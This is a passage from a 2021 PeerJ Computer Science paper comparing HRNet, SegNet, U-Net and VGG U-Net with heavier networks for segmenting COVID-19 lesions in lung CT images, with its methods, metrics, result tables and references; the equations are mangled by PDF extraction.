accuracy and considerably lowered the computational demands of the detection and segmentation system. Ke et al. (2019) proposed a neuro-heuristic algorithm to segment lung diseases from X-ray Images. The algorithm achieved an average accuracy of 79.06% to segment and classifies three diseases in the X-ray Images. But for our study, CT Scans were chosen as the primary source of data due to the easy availability and higher number of slices per scan. Therefore, we would have more data than X-ray Images. The common manifestations of SARS-CoV-2 in chest CT scan are ground glass opacities, consolidation, crazy paving, dilation of vessel width in some cases and round shape lesions in few cases (Hamer et al., 2020; Zu et al., 2020). The effectiveness of the chest CT scan based COVID-19 management depends on the efficient automatic detection and segmentation of regions in the scan. So in that context, the recent developments in the imaging technologies come handy. There are plenty of imaging tools which give very high and accurate quantification of abnormal conditions. This procedure of image based diagnosis system involves capturing the image, analyzing the image by a trained, experienced radiologist and annotation is made for the ground truth segments. The current scenario slows down the annotation of the images, labeling and getting the ground truth processes due to the increasing number of patients day by day, lack of radiologist and the over duty burden of existing radiologists. Therefore, automatically detecting the infected regions from the chest CT scan using computer based algorithms are the current trends in research that gives wonderful results and aids in medical diagnostics. The main objective of the research work is, comparing the segmentation performance of computationally non-intensive models deep learning model when subjected to Lung CT Scans for that are affected by COVID-19. The models utilized for the research belong to the U-Net variants models which are the most popular models of choice for segmentation of Medical Images. Here we compare the traditional U-Net model as proposed by Ronneberger with other variants such as Seg Net, U-Net based on VGG16 and High Resolution Net (HR-Net) and present both qualitative and quantitative results. MATERIALS AND METHODS The block diagram describing the entire methodology is shown below in Fig. 2. The description of each method is described below. Dataset considered The used dataset consists of 3,770 images and their corresponding ground truths. A total of 3,020 training images are used and 750 testing images are used. The CT scans of 50 patients were taken from mosmed.ai (Morozov et al., 2020) were openly accessible Neuroimaging Informatics Technology Initiative (NIFTI) images were provided. The data was collected from the Research and Practical Clinical Center for Diagnostics and Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 3/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Telemedicine Technologies of the Moscow Health Care Department. The CT Scans were obtained between 1st March 2020 and 25th April 2020. Each NIFTI file was decompressed to PNG images and used for the study. The CT scans of another 20 patients were taken from zenodo.org (Jun et al., 2020) where the NIFTI files of 20 patients were provided. The images were annotated by two radiologists and verified by an experienced radiologist. For both datasets, MATLAB was used to extract the PNG images. Pre-processing The images in the dataset are riddled with motion artifacts and noise. Motion artifacts are caused due to improper imaging techniques and are a specific kind of noise relevant to CT Scans. Therefore, removing this noise is important or else it will cause the algorithms to learn improperly. MATLAB is used to remove the noise and motion artifacts. The original image is converted to grayscale from RGB and then, the image properties are extracted. Area and Solidity are used and then, the image is thresholded after selecting the max area and highest solidity. Once a mask is ready, the mask is multiplied with the original image to get the pre-processed image. A comparison is given below in Fig. 1. As can be seen, motion artifacts are removed and the image has more clarity. Other pre-processing methods to remove the noise and motion artifacts from Lung CT Images are using a mean filter (Khan, 2019) and a series of region growing and morphological applications (Devarapalli, Kalluri & Dondeti, 2019). These methods were mainly used to remove the sharp edges in the CT scans and to smoothen the image so that the network could learn better. But, on comparison of the different methods, our pre-processing method provided a better performance in all metrics HR Net HRNet is developed at Microsoft and has signified state of art presentation in the areas of semantic segmentation, image classification, facial detection, object detection and Figure 1 Comparison between original image (A) and pre-processed image (B). Full-size DOI: 10.7717/peerj-cs.368/fig-1 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 4/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-1 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ pose estimation (Sun et al., 2019). Its attention is on training High Resolution (HR) representation. The existing techniques recuperate representation of high resolution from representation of low resolution formed by high to low resolution network. In HRNet, from first stage commencement high-resolution network, progressively augment high to low resolution networks successively to arrange more steps and associate the multi- resolution network in parallel. HRNet is able of uphold high-resolution representation throughout the process as repeated multi-scale combinations are conducted by switching the information through the multi-resolution parallel subnetworks repeatedly throughout the process (Sun et al., 2019). The architecture of resulting network is displayed in Fig. 3. This network has advantages in contrast to existing networks like Segnet, UNET, Hourglass etc. These existing networks lose a lot of essential information in the progression of recovering high-resolution from low-resolution representation. HRNet links high to low resolution networks in parallel instead of series and this gives high-resolution representation throughout the process, correspondingly the estimated heatmap is much accurate, spatially much precise. Figure 2 Block diagram of proposed method. Full-size DOI: 10.7717/peerj-cs.368/fig-2 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 5/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-2 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Multi-resolution sequential subnetwork Existing models works by linking high to low resolution convolutions subnetwork in series, where each individual subnetwork form a platform, collection of an arrangement of convolutions furthermore, there is a down sample layer through end-to-end subnetworks to split the resolution into halves. Let N sr be the subnet in the stage sth and resolution index r. First subnet resolution is given by 12r�1. The high-to-low system with S phases/stages (i.e., 4) can be indicated as: N 11 ! N 22 ! N 33 ! N 44 (1) Multi-resolution parallel subnetwork Starting from first phase/stage begin with high resolution subnet, slowly enhance high to low resolution subnet, generating new phases/stages, and associate multi-resolution subnet in parallel. Eventually, the parallel subnet resolution of a later phase/stage comprises of the resolution from an earlier stage and below one stage. The network shown below contains 4 parallel subnets. (2) Figure 3 Architecture of HRNet. Full-size DOI: 10.7717/peerj-cs.368/fig-3 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 6/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-3 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Multi-scale repeated fusion In this network exchange units were introduced throughout parallel subnet in such a way that an individual subnet continuously collects information from parallel subnets. How information is exchanged lets understand this process through an example here third stage is subdivided into multiple exchange blocks and every block consists of three parallel convolution modules, having exchange units followed by parallel units which is shown below: (3) where: Cbsr – Convolution module, ebs – Exchange Unit, and s is the stage, r is the resolution and b is the block Explanation of exchange units is show in Fig. 4. The input mapping is given by: {X1; X2; X3; . . . ; Xsg and the output mapping was given by: fY1; Y2; Y3; . . . ; Ysg. The width and resolution of the output is same as input. Every output is a sum of input mapping that is, YK ¼ Ps i¼1 aðXi; KÞ. Assume of 3 � 3 stride was done for down sampling and for up sampling 1 � 1 convolution (nearest neighbor). HRNet experimental results (when tested with different datasets) show remarkable results for the applications like facial detection, semantic segmentation, and object detection. Seg Net At the university of Cambridge, UK, team of the robotics group researched and developed that SegNet is a deep encoder decoder architecture for multiclass pixel-wise segmentation (Badrinarayanan, Kendall & Cipolla, 2017). The framework comprises order of non-linear processing layers which is called encoders and a similar set of decoders afterward a pixel wise classifier. Generally, encoder have made up of a ReLU non-linearity and one or more convolutional layers with batch normalization, subsequently non- overlapping maxpooling and subsampling. Using Max-pooling indices in encoding sequence, for up sampling the sparse encoding in consequence the pooling process to the decoder. Use of max-pooling indices in the decoders is the one important feature of the SegNet to execute the sampling of low resolution maps. For segmented images the tendency to retain high frequency details and capable enough to decrease the number of Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 7/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ parameters in the decoder needed for training are some advantages of SegNet. Using stochastic gradient descent this framework can be trained end-to-end. SegNet is composed of encoder and decoder after a last pixel-wise classification layer. The architecture is shown in Fig. 5. The encoder in SegNet is composed of convolution layers which are 13 in number, and these layer matches with the 13 starting layers of VGG16, considered for classifying the objects (Mannem, Ca & Ghosh, 2019). Figure 6 illustrates the decoding method utilized by SegNet in which there is no learning engaged with the up-sampling stage. The upsampling of decoder network’s feature map (input) is done by learned maxpooling indices from the equivalent encoder feature map. Dense feature maps are generated by combining feature maps and trainable decoder channel. SegNet a deep network was used for semantic segmentation. Basically, It was designed because the motivation behindhand was to propose an architecture for roads, outdoor and indoor sites which is proficient together in terms of computational time and memory. Feature map’s maxpooling indices are only stored in SegNet and to attain better performance it uses them in its decoder network. UNet The UNet design is based upon the fully convolution network and adjusted such that it produces better segmentation results in medical imaging. UNet consists of two paths named as contracting and and expansive. In the contracting path it captures the context whereas in expansive path it enables exact localization. While contracting path is a classical Figure 4 Layers of exchange unit of convolutions with various resolutions: (A) low, (B) medium and (C) high resolution. Full-size DOI: 10.7717/peerj-cs.368/fig-4 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 8/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-4 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ architecture of UNet. It includes two 3 × 3 convolutions, max pooling operation with repeating application. The Fig. 7 illustrates the architecture of UNet, which is U in shape that itself gives the name “UNet”. The main philosophy behind this network is, it replace pooling operation by using upsampling operators (Ronneberger, Fischer & Brox, 2015). So, ultimately the resolution will increase layer by layer. The main feature of UNet is the Figure 5 SegNet architecture. Photograph source credit: Google Earth image, ©2015 Google. Full-size DOI: 10.7717/peerj-cs.368/fig-5 Figure 6 Decoding techniques used by SegNet. Full-size DOI: 10.7717/peerj-cs.368/fig-6 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 9/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-5 http://dx.doi.org/10.7717/peerj-cs.368/fig-6 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ large number of channels which lead to higher resolution. Moreover, in every downsampling it doubles the feature channels. Each stage in the expansive path involves upsampling of the feature channel followed by (2 × 2) convolution that splits the number of feature channels into halves. In contracting path, it crops the feature map because of loss in border pixel in each convolution. Final layer is mapped by 1 × 1 convolutions which is used to map all 64 units feature vector. The network contains total 23 convolutional layers. UNet performs well on image segmentation (Livne et al., 2019). While training the UNet model, the cross-entropy loss function united with the last feature map and by applying a pixel-wise softmax over it, the softmax is denoted as: pk ¼ e ak xð Þð Þ PK k0¼1 e ak0xð Þ (4) In addition, the energy function is calculated by: E ¼ X x2� w xð Þ log pl xð Þ xð Þ � � (5) where: ak: Represents the activation in feature map k pk: Represents estimated maximum function K: No. of class x 2 �: Pixel position pl xð Þ: Deviation Figure 7 Illustrating the architecture of U-Net. Full-size DOI: 10.7717/peerj-cs.368/fig-7 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 10/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-7 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ In the training data set, to counterbalance the diverse frequency of pixels from a specific class the weight map is pre calculated for ground-truth segmentation, and enforcing the network to study the minor separation borders amid touching cells introduce by us. The morphological operation used to calculate separation borders, the weight map calculated using: w xð Þ ¼ wc xð Þ þ w0:e � ðd1 xð Þþd2 xð ÞÞ 2 2s2 � � (6) where: w: denotes the weight map d1: distance upto border of nearest first cell d2: distance upto border of nearest second cell VGG UNet Image segmentation, which is performed pixel wise is most preferable task in the field of computer vision. Encoders-decoders when combined they form UNET architectures, which are very famous for image segmentation in medical imaging and satellite images etc. The weights of the pre-trained models (like ImageNet) are used to initialize the weights of the neural network (i.e., trained on large dataset) as it gives better performance major than those models, which are trained on small dataset from scratch. Models accuracy is very important in some applications like traffic safety and medicine pre-trained encoder can enhance the architecture and performance of UNET. Applications like Object detection, image classification and scene understanding have improved their performance after the introduction of convolutional neural network (CNN). Nowadays, CNN has outperformed in several fields over human experts. Image segmentation plays vital role in the field of medical imaging to enhance the diagnostic capabilities. Fully connected network (FCN) is amongst the most popular state-of-the-art machine learning technique (Long, Shelhamer & Darrell, 2015). Segmentation accuracy attained by some advancement in FCN as compared to PASCAL VOC (Everingham et al., 2015) common approach on standard datasets UNet consists of two paths named as contracting and and expansive. In the contracting path it captures the context whereas in expansive path it enables exact localization. The contracting path sticks with the design of a convolutional network with pooling operations, alternating convolution, gradually down sample feature channels and expanding many feature maps layer simultaneously, each stage in the expansive path composed of an up-sampling of the feature channel along with a convolution. The VGGUnet architecture is illustrated in Fig. 8. The encoder for UNET model is composed of 11 successive (series) layers VGG family and denoted by VGG-11 (Ai et al., 2020). VGG-11 consist of 7 convolution layers each using rectified linear unit (ReLu) activation function, 5 maxpooling operations each reduces feature channel by 2 and the kernels size 3 × 3 is used for every convolutional layer (Iglovikov & Shvets, 2018). Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 11/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Common loss function that is, binary cross entropy can be used for classification problem where ŷi denotes the prediction, yi denotes the true value and m denotes the no. of samples H ¼ � 1 m Xm i¼1 ðyi log ŷi þ 1 � yið Þ log 1 � ŷi � � Þ (7) Performance validation To validate the performance of the models presented above, Sensitivity, Specificity, Jaccard Index, Dice Coefficient, Accuracy and Precision are used. To measure the accuracy of the segmented image, accuracy and precision are used and to measure the quality of segmentation, sensitivity and specificity are used. The various performance measures are described below: Accuracy and Precision are used to calculate the accuracy of the segmentation model itself. Accuracy is as the ratio of correct predictions to the total number of predictions and Precision is defined as the ratio of correctly predicted positive observations to the total number of correctly predicted observations. Accuracy ¼ TP þ TN TP þ TN þ FP þ FN (8) Precision ¼ TP TP þ FP (9) Figure 8 Illustrating encoder decoder architecture also known as VGGUNet. Full-size DOI: 10.7717/peerj-cs.368/fig-8 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 12/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-8 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ In the case of segmentation, accuracy and precision are used to measure the binary segmentation of each pixel of the image by the model. Although precision and accuracy may seem to be enough to describe the performance of the model, other factors are also important to describe the quality of segmentation. Sensitivity and Specificity are used to measure the quality of segmentation between the classes. In this case, the models are performing binary segmentation. So, Sensitivity, or the True Positive Rate, measures the quality of segmentation of one class and Specificity, or the True Negative Rate, measures the quality of segmentation of the other class. Sensitivity and Specificity can be defined as: Sensitivity ¼ TPðTP þ FNÞ (10) Specificity ¼ TNðTN þ FPÞ (11) With Sensitivity and Specificity, having a high value for each is good as it shows that the model is able to segment the pixels correctly without any errors. The Jaccard Index and Dice Coefficient are used to quantify the similarity between the original image and the segmented image. Jaccard Index and Dice Coefficient are similar to the Intersection over Union (IoU) used to evaluate Object detection models. Jaccard Index and Dice Coefficient ranges from 0 to 1 where 0 means no overlap and 1 mean full similarity. Jaccard Index and Dice Coefficient can be defined as: Dice Coefficient ¼ 2TP 2TP þ FP þ FN (12) Jaccard Index ¼ TP TP þ FP þ FN (13) While the Dice coefficient and the Jaccard Index are quite similar, ideally, the two measures have to be equal. So, to measure the quality of similarity of the model, a similarity between the Dice Coefficient and Jaccard Index can be viewed to measure the quality of segmentation. RESULTS AND DISCUSSION The experiments were conducted in the Google Colab platform. As shown in Table 1, HR Net is shown to have the highest performance as compared to the other models. The second best model is the classical UNet, the third best model is the VGG UNet and the model with the worst performance is the Seg Net. The reason for the high performance of the HR Net is the fact that the HR Net extracts high resolution information and retains in throughout the segmentation process. This is due to the parallel networks that are able to maintain essential information. HR Net indicates a high accuracy of segmentation with an Accuracy of 0.9624 and a Specificity of 0.9930. The performance is also compared against heavy weight models that have more parameters and layers than the Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 13/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ lightweight models. The weight size is also considerably larger. As per our study, lightweight models offer better performance as compared to heavy weight models in all evaluation metrics. Especially in Dice Coefficient, Accuracy and Precision, the lightweight models like HR Net and UNet offer better performance than Inception ResNetV2 and ResNet 101. SegNet and VGG UNet are comparable to the performance of the heavy weight models. Figures 9 and 10 shows the various outputs obtained from the models which segmented the positive tested and negative tested image respectively. HR Net shows the best segmentation performance while UNet shows good performance too. UNet is able to obtain a proper boundary similar to the test image. Seg Net has performed poorly to segment the image. Neither has it obtained a boundary nor has it segmented the finer details properly. The VGG UNet has segmented the image properly but not to the extent of HR Net or UNet. We can see that HR Net has the best performance. With decreased area, the performance decreases which means that UNet is the second best performance, VGG UNet is the third best and Seg Net has the worst performance amongst the models. When we compare Figs. 9 and 10 with Tables 1 and 2, we can review the performance of the models on COVID positive and negative slices. On comparing HR Net with ResNet 101 and InceptionResNetV2, we can see that HR Net shows comparable performance to the heavy weight models but still performs better in terms of performance metrics like Jaccard Index and Dice Coefficient. This disparity is especially seen in terms of Accuracy. The Specificity of HR Net is also much higher than the heavy weight models. This can be attributed to the method in which HR Net extracts the features. Even though the numbers of layers are more, it still retains a smaller size than the heavy weight models without sacrificing on performance. The next best performer is UNet as can be seen from the images. UNet is able to segment the boundaries and consistencies of the slices but cannot maintain the shape in all the predictions. VGG UNet and Seg Net perform the worst each with having their own disadvantages. VGG UNet might be better at detecting finer details in the lungs but cannot maintain the basic predictive ability to detect boundaries and textures. Seg Net performs the worst as it cannot segment even the most basic boundary or details. Since it is used more as a segmentation algorithm for land masses, this makes sense for Seg Net to perform badly in the case of Lung CT slices. Table 1 Performance measures of segmentation performed on four light weight and two heavy weight models mentioned. Method FPrate FNrate TPrate = Sensitivity TNrate = Specificity Jaccard Dice Accuracy Precision HR_Net 0.0142 0.1085 0.8862 0.9930 0.8428 0.9147 0.9624 0.9593 Seg_Net 0.2148 0.2141 0.7859 0.7952 0.7962 0.8014 0.8816 0.8416 UNet 0.1260 0.1785 0.8215 0.9195 0.8143 0.8836 0.9105 0.9281 VGG_UNet 0.2259 0.2082 0.7918 0.7964 0.8224 0.8418 0.8794 0.8416 Inception ResNet V2 0.1879 0.1762 0.8064 0.8267 0.8069 0.8154 0.9268 0.9154 ResNet 101 0.2567 0.2481 0.8341 0.8249 0.8395 0.8254 0.9087 0.9354 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 14/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Figure 11 is the glyph plot which is a visual representation of the performance metrics for each model. The glyph plot is a good way to directly compare the performance of various models through the use of polygons. We can see that HR Net has the best performance. The six points are the performance measures namely Sensitivity, Specificity, Precision, Accuracy, Jaccard Index and Dice Coefficient. With decreased area, the performance decreases which means that UNet is the second best performance, VGG UNet is the third best and Seg Net has the worst performance amongst the models. As can be seen from Table 2, HR-Net has the highest number of layers at 1,043 with other models having less than 100 layers. But, HR-Net has similar parameters to VGG UNet and an even lesser number of parameters than SegNet. This is due to the architecture of the HR-Net. It is able to extract deeper features than the other models while maintaining the overall file size and number of parameters. The reason for HR-Net having the Figure 9 COVID positive tested with all the four lightweight and two heavy weight models. (A) Original image and predictions from (B) UNet (C) Seg Net (D) VGG UNet (E) HR Net (F) ResNet 101 and (G) Inception ResNetV2. Full-size DOI: 10.7717/peerj-cs.368/fig-9 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 15/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-9 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Figure 10 COVID negative tested with all the four lightweight and two heavy weight models. (A) Original image and predictions from (B) UNet (C) Seg Net (D) VGG UNet (E) HR Net (F) ResNet 101 and (G) Inception ResNetV2. Full-size DOI: 10.7717/peerj-cs.368/fig-10 Table 2 Inference speed of the four light weight and two heavy weight models along with other parameters which affects the inference speed. Name of model Inference time (ms) Number of layers Number of params Model size (MB) UNet 42 32 7,759,521 30 SegNet 84 64 31,819,649 122 VGG UNet 65 85 25,882,433 99 HR Net 140 1043 28,607,456 112 Inception ResNet V2 123 572 55,873,736 215 ResNet 101 115 101 44,675,560 171 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 16/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-10 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ highest performance is its architecture which makes it the best model to be used for fast inference. Comparing the SegNet, VGG UNet and UNet, SegNet has the poorest inference speed at 84 ms with the largest model size. It is therefore inferred that SegNet is the worst model to use for the Segmentation of COVID-19 based on our study. VGG UNet and UNet have different metrics due to the fact that VGG UNet is trained on the VGG-16 weights. It, therefore, takes far higher time to load on and produce an inference than UNet. If HR-Net cannot be used, VGG UNet is the next best network for segmenting COVID-19. To check whether the performance of lightweight models is better than previous literature, we have checked the performance with “heavy-weight” models. Heavy weight models can be classified as those models with more number of layers; parameters and weight file size in Mega Bytes (MB). The Heavy weight models do not offer better performance than the lightweight models in terms of inference time. The heavy weight models are slower than the lightweight models in segmenting COVID-19 from CT images and also, take up more memory space. While the inference time is faster than HR Net, the number of parameters and model size does not allow the models to perform as well as the light weight models. CONCLUSION In this article, we analyzed four models for segmenting COVID-19 from Lung CT Images. With the growing number of cases worldwide, quick and accurate testing is needed. To solve this problem, we approached the problem by reviewing four lightweight models that do not take a long time for training or testing. First, we remove motion artifacts from Figure 11 Glyph plot representing the performance of the models over the performance measures. (A) HR Net; (B) Seg Net; (C) UNet; (D) VGG UNet (The 6 points are the performance measures namely Sensitivity, Specificity, Precision, Accuracy, Jaccard Index and Dice Coe). Full-size DOI: 10.7717/peerj-cs.368/fig-11 Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 17/20 http://dx.doi.org/10.7717/peerj-cs.368/fig-11 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ the tomographic images through Thresholding and use the pre-processed images for training the models. The four models trained are Seg Net, UNet, VGG UNet and HR-Net. We evaluate the models on their performance using accuracy, dice, Jaccard index and precision. We also used Specificity and Sensitivity as secondary evaluation characteristics. The results obtained demonstrate that lightweight convolutional networks have high latent ability to segment COVID-19 from CT images with HRNet being the best network out of the four models analyzed. Our work can be used in real-time environments to deploy on low-power devices. Low-Power devices require less computation time and have many constraints. When we consider these constraints, then using our lightweight models is very efficient as the user can accurately segment COVID-19 from CT Images. This system can be used in the field where electricity is constrained and fast and accurate predictions are required. The proposed light weight model can be implemented a simpler hardware that requires less area and power requirements. Due to the lower power usage, the prototype can be used as standalone systems in power constrained conditions but require accurate predictions. The results in this study can be improved by collecting more data from hospitals and clinics to improve the accuracy of the segmentation. We can also improve the work by changing the architecture of the proposed models to extract more features without increasing the inference time significantly. ACKNOWLEDGEMENTS We would like to thank VIT University for the nurturing environment as well as the exposure it provided for us to complete this project. We also would like to thank MosMedData for the Covid 19 dataset which is used for this research work. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Tharun J. Iyer performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � Alex Noel Joseph Raj conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Sushil Ghildiyal performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Ruban Nersisson analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 18/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Code and data are available at GitHub: https://github.com/IyerOnFyer/COVID-19- Segmentation.git. REFERENCES Ai T, Yang Z, Hou H, Zhan C, Chen C, Lv W, Tao Q, Sun Z, Xia L. 2020. Correlation of chest CT and RT-PCR testing in coronavirus disease 2019 (COVID-19) in China: a report of 1014 cases. Radiology 296(2):E32–E40 DOI 10.1148/radiol.2020200642. Badrinarayanan V, Kendall A, Cipolla R. 2017. SegNet: a deep convolutional encoder-decoder architecture for image segmentation. IEEE Transactions on Pattern Analysis and Machine Intelligence 39(12):2481–2495 DOI 10.1109/TPAMI.2016.2644615. Capizzi G, Sciuto GL, Napoli C, Polap D, Woźniak M. 2019. Small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. IEEE Transactions on Fuzzy Systems 28(6):1178–1189. Chan JFW, Yuan S, Kok KH, To KKW, Chu H, Yang J, Xing F, Liu J, Yip CCY, Poon RWS, Tsoi HW. 2020. A familial cluster of pneumonia associated with the 2019 novel coronavirus indicating person-to-person transmission: a study of a family cluster. Lancet 395(10223):514–523 DOI 10.1016/S0140-6736(20)30154-9. Chen X, Yao L, Zhang Y. 2020. Residual attention U-Net for automated multi-class segmentation of COVID-19 chest CT images. Available at http://arxiv.org/abs/2004.05645. Devarapalli RM, Kalluri HK, Dondeti V. 2019. Lung cancer detection of CT lung images. International Journal of Recent Technology and Engineering 7(5S4):413–416. Everingham M, Eslami SA, Van Gool L, Williams CK, Winn J, Zisserman A. 2015. The pascal visual object classes challenge: a retrospective. International Journal of Computer Vision 111(1):98–136 DOI 10.1007/s11263-014-0733-5. Hamer OW, Salzberger B, Gebauer J, Stroszczynski C, Pfeifer M. 2020. CT morphology of COVID-19: case report and review of literature. RöFo - Fortschritte auf dem Gebiet der Röntgenstrahlen und der bildgebenden Verfahren 192(5):386–392 DOI 10.1055/a-1142-4094. Iglovikov V, Shvets A. 2018. TernausNet: U-Net with VGG11 encoder pre-trained on imagenet for image segmentation. Available at http://arxiv.org/abs/1801.05746. Jamshidi M, Lalbakhsh A, Talla J, Peroutka Z, Hadjilooei F, Lalbakhsh P, Jamshidi M, La Spada L, Mirmozafari M, Dehghani M, Sabet A. 2020. Artificial intelligence and COVID-19: deep learning approaches for diagnosis and treatment. IEEE Access 8:109581–109595 DOI 10.1109/ACCESS.2020.3001973. Jun M, Cheng G, Yixin W, Xingle A, Jiantao G, Ziqi Y, Jian H. 2020. COVID-19 CT Lung and infection segmentation dataset (Version 1.0) [Data set]. Zenodo. DOI 10.5281/zenodo.3757476. Ke Q, Zhang J, Wei W, Połap D, Woźniak M, Kośmider L, Damaševĭcius R. 2019. A neuro- heuristic approach for recognition of lung diseases from X-ray images. Expert Systems with Applications 126(5):218–232 DOI 10.1016/j.eswa.2019.01.060. Khan ZF. 2019. Automated segmentation of lung parenchyma using colour based fuzzy C-means clustering. Journal of Electrical Engineering & Technology 14(5):2163–2169 DOI 10.1007/s42835-019-00224-8. Li Y, Xia L. 2020. Coronavirus disease 2019 (COVID-19): role of chest CT in diagnosis and management. American Journal of Roentgenology 214(6):1–7 DOI 10.2214/AJR.20.22954. Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 19/20 https://github.com/IyerOnFyer/COVID-19-Segmentation.git https://github.com/IyerOnFyer/COVID-19-Segmentation.git http://dx.doi.org/10.1148/radiol.2020200642 http://dx.doi.org/10.1109/TPAMI.2016.2644615 http://dx.doi.org/10.1016/S0140-6736(20)30154-9 http://arxiv.org/abs/2004.05645 http://dx.doi.org/10.1007/s11263-014-0733-5 http://dx.doi.org/10.1055/a-1142-4094 http://arxiv.org/abs/1801.05746 http://dx.doi.org/10.1109/ACCESS.2020.3001973 http://dx.doi.org/10.5281/zenodo.3757476 http://dx.doi.org/10.1016/j.eswa.2019.01.060 http://dx.doi.org/10.1007/s42835-019-00224-8 http://dx.doi.org/10.2214/AJR.20.22954 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ Liu W, Zhang Q, Chen J, Xiang R, Song H, Shu S, Chen L, Liang L, Zhou J, You L, Wu P. 2020. Detection of Covid-19 in children in early January 2020 in Wuhan. China New England Journal of Medicine 382(14):1370–1371 DOI 10.1056/NEJMc2003717. Livne M, Rieger J, Aydin OU, Taha AA, Akay EM, Kossen T, Madai VI. 2019. A U-net deep learning framework for high performance vessel segmentation in patients with cerebrovascular disease. Frontiers in Neuroscience 13(Feb):1–13 DOI 10.3389/fnins.2019.00097. Long J, Shelhamer E, Darrell T. 2015. Fully convolutional networks for semantic segmentation. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 3431–3440. Mannem R, Ca V, Ghosh PK. 2019. A SegNet based image enhancement technique for air-tissue boundary segmentation in real-time magnetic resonance imaging video. In: 25th National Conference on Communications, NCC 2019. Morozov SP, Andreychenko AE, Pavlov NA, Vladzymyrskyy AV, Ledikhova NV, Gombolevskiy VA, Blokhin IA, Gelezhe PB, Gonchar AV, Chernina VY. 2020. MosMedData: chest CT scans with COVID-19 related findings dataset. Available at http://arxiv.org/abs/2005.06465. Ronneberger O, Fischer P, Brox T. 2015. U-net: convolutional networks for biomedical image segmentation. Lecture Notes in Computer Science 9351:234–241. Sun K, Xiao B, Liu D, Wang J. 2019. Deep high-resolution representation learning for human pose estimation. In: Proceedings of the IEEE Computer Society Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 5686–5696. Sun K, Zhao Y, Jiang B, Cheng T, Xiao B, Liu D, Mu Y, Wang X, Liu W, Wang J. 2019. High-resolution representations for labeling pixels and regions. Available at http://arxiv.org/abs/ 1904.04514. Wieczorek M, Siłka J, Woźniak M. 2020. Neural network powered COVID-19 spread forecasting model. Chaos, Solitons & Fractals 140(2):110203 DOI 10.1016/j.chaos.2020.110203. World Health Organization. 2020. WHO Director General’s remarks at the media briefing on 2019-n CoV on 11th February 2020. Available at https://www.who.int/dg/speeches/detail/who- director-general-s-remarks-at-the-media-briefing-on-2019-ncov-on-11-february-2020. Zhu N, Zhang D, Wang W, Li X, Yang B, Song J, Zhao X, Huang B, Shi W, Lu R, Niu P. 2020. A novel coronavirus from patients with pneumonia in China, 2019. New England Journal of Medicine 382(8):727–733 DOI 10.1056/NEJMoa2001017. Zu ZY, Jiang MD, Xu PP, Chen W, Ni QQ, Lu GM, Zhang LJ. 2020. Coronavirus disease 2019 (COVID-19): a perspective from China. Radiology 296(2):E15–E25 DOI 10.1148/radiol.2020200490. Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 20/20 http://dx.doi.org/10.1056/NEJMc2003717 http://dx.doi.org/10.3389/fnins.2019.00097 http://arxiv.org/abs/2005.06465 http://arxiv.org/abs/1904.04514 http://arxiv.org/abs/1904.04514 http://dx.doi.org/10.1016/j.chaos.2020.110203 